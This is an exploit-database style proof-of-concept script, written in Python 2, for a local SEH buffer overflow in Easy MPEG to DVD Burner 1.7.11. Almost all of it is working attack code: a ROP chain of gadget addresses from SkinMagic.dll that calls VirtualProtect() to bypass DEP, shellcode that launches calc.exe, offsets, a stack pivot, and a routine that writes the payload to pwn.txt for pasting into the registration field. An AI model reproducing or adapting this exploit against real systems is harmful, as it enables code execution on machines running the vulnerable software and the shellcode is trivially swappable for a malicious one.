Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)

# Exploit Title: Easy MPEG to DVD Burner 1.7.11 - Buffer Overflow (SEH + DEP)
# Date: 2020-04-15
# Exploit Author: Bailey Belisario
# Tested On: Windows 7 Ultimate x64
# Software Link: https://www.exploit-db.com/apps/32dc10d6e60ceb4d6e57052b6de3a0ba-easy_mpeg_to_dvd.exe
# Version: 1.7.11
# Exploit Length: 1015 Bytes
# Steps : Open application > Register > In Username field paste content of pwn.txt file (Note open this in sublime or vscode)

# Easy MPEG to DVD Burner 1.7.11 SEH + DEP Bypass using VirtualProtect() on Local Buffer Overflow 
# Exploit used with Python2.7
#------------------------------------------------------------------------------------------------------------------------------------#
# Bad Characters: \x00\x0a\x0d                                                                                                        #
# SEH Offset: 1012                                                                                                                   #
# Modules Used: SkinMagic.dll & Easy MPEG to DVD Burner.exe                                                             #
#------------------------------------------------------------------------------------------------------------------------------------#

# Register setup for VirtualProtect() (Bypass DEP) :
#---------------------------------------------------
# EAX = Points to PUSHAD at time VirtualProtect() is called
# ECX = lpflOldProtect (0x10047d30 as writable location)
# EDX = flNewProtect(0x40)
# EBX = dwSize (0x92)
# ESP = lpAddress (automatic)
# EBP = ReturnTo (ptr to jmp esp)
# ESI = ptr to VirtualProtect()
# EDI = ROP NOP (RETN)

import struct

def create_rop_chain():

    rop_gadgets = [
      
      # Put 1 in EDX and decrement to 0
      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
      0x1003629a,  # ADD EAX,4 # DEC EDX # JNE SKINMAGIC!SETSKINMENU+0X2F505 (10036295) # POP ESI # RETN
      0x11111111,  # Filler

      # Pop the pointer of VirtualProtect into EAX 
      0x10037b12,  # POP EAX # RETN
      0x1003b268,  # ptr to &VirtualProtect() [IAT SkinMagic.dll]

      # Dereference Pointer into EDX then move back to EAX
      0x1001c011,  # ADD EDX,DWORD PTR [EAX] # RETN 0x0C
      0x10031772,  # MOV EAX,EDX # RETN
      0x11111111,  # Filler
      0x11111111,  # Filler
      0x11111111,  # Filler

      # Push VP and pop into EBP
      0x1002e17b,  # PUSH EAX # PUSH ESP # XOR EAX,EAX # POP ESI # POP EBP # RETN 0x0C
      0x10037b12,  # POP EAX # RETN
      0x11111111,  # Filler
      0x11111111,  # Filler
      0x11111111,  # Filler

      # Use this to get to address needed to Pop VP into ESI
	    0x1003619e,  # POP EAX # POP ESI # RETN

	    # Move VP to +12 on stack then push the POP POP RETN
      0x10032485,  # MOV DWORD PTR [ESP+0CH],EBP # LEA EBP,DWORD PTR DS:[ESP+0CH] # PUSH EAX # RETN
      0x11111111,  # Filler popped
      0x11111111,  # Filler popped

      # Set ESI to VP
      0x1002e1ce,  # POP ESI # RETN [SkinMagic.dll] 
      0x11111111,  # Where VP is MOV into 

	    # Set EBP with POP EBP RETN
      0x1002894f,  # POP EBP # RETN [SkinMagic.dll] 
      0x1002894f,  # skip 4 bytes [SkinMagic.dll]

      # Set EDX (# s -d 0x10000000 L?0x10050000 0000003f <- used to find 3F)
      # Clear out EDX, set it to 0x01, find address where DWORD of EAX will be 0x3F, then add to EDX to be 0x40
      0x10031752,  # XOR EDX,EDX # CMP EAX,DWORD PTR [ECX+8] # SETGE DL # MOV AL,DL # RETN
 	    0x10037b12,  # POP EAX # RETN
 	    0x1005a0a0,  # Address of 3F
 	    0x10026173,  # ADD EDX,DWORD PTR [EAX] # RETN

 	    # Set EBX to 0x92 assuming EBX is 0, but could work with a decent range of numbers
 	    # Note: This should be at least length of shellcode
 	    0x100362c6,  # XOR EAX,EAX # RETN
	    0x10033fb2,  # ADD AL,0C9 # RETN
	    0x10033fb2,  # ADD AL,0C9 # RETN
	    0x10035c12,  # ADC BL,AL # OR CL,CL # JNE SKINMAGIC!SETSKINMENU+0X2EEDB (10035C6B) # RETN
     
      # Set ECX to writable location
      0x1003603f,  # POP ECX # RETN [SkinMagic.dll] 
      0x10047d30,  # &Writable location [SkinMagic.dll]
      
      # Set EDI to ROP NOP
      0x100395c2,  # POP EDI # RETN [SkinMagic.dll] 
      0x10032982,  # RETN (ROP NOP) [SkinMagic.dll]
      
      # Do PUSHAD and be 1337
      0x10037654,  # POP EAX # RETN 
      0xa140acd2,  # CONSTANT
      0x100317c8,  # ADD EAX,5EFFC883 # RETN 
      0x1003248d,  # PUSH EAX # RETN

      # Used to jump to ESP
      0x1001cc57,  # ptr to 'push esp # ret ' [SkinMagic.dll]
    ]
    return ''.join(struct.pack('<I', _) for _ in rop_gadgets)

ropChain = create_rop_chain()

# CALC.EXE for POC
shell = ("\x31\xD2\x52\x68\x63\x61\x6C\x63\x89\xE6\x52\x56\x64\x8B\x72"
         "\x30\x8B\x76\x0C\x8B\x76\x0C\xAD\x8B\x30\x8B\x7E\x18\x8B\x5F"
         "\x3C\x8B\x5C\x1F\x78\x8B\x74\x1F\x20\x01\xFE\x8B\x4C\x1F\x24"
         "\x01\xF9\x0F\xB7\x2C\x51\x42\xAD\x81\x3C\x07\x57\x69\x6E\x45"
         "\x75\xF1\x8B\x74\x1F\x1C\x01\xFE\x03\x3C\xAE\xFF\xD7")

# 148 Bytes needed to return to ROP CHAIN
paddingBeginning = "B"*148

# NOP Sled needs to be sufficient length, from some math, I came out with a buffer of 444 - len(ROP CHAIN)  
nopLen = 444 - len(ropChain)
nopSled = '\x90'*nopLen

# Padding to SEH needs to consider the 420 bytes remaining - shellcode
paddingMiddleLen = 420 - len(shell)
paddingMiddle = 'B'*paddingMiddleLen

# 0x004043ee (add esp, 7D4) Stack Pivot 2004 bytes
# This brings total bytes to SEH Offset (1012) + 3 for a total of 1015 bytes
seh = "\xee\x43\x40"

# Exploit Visualization  #
#------------------------#
#  BBBBBBBBBBBBBBBBBBBB  #
#------------------------#
#       ROP CHAIN        #
#------------------------#
#          NOPS          #
#------------------------#
#       SHELL CODE       #
#------------------------#
#  BBBBBBBBBBBBBBBBBBBB  #
#------------------------#
#          SEH           #
#------------------------#

exploit = paddingBeginning + ropChain + nopSled + shell + paddingMiddle + seh

file = open("pwn.txt", 'w')
file.write(exploit)
file.close()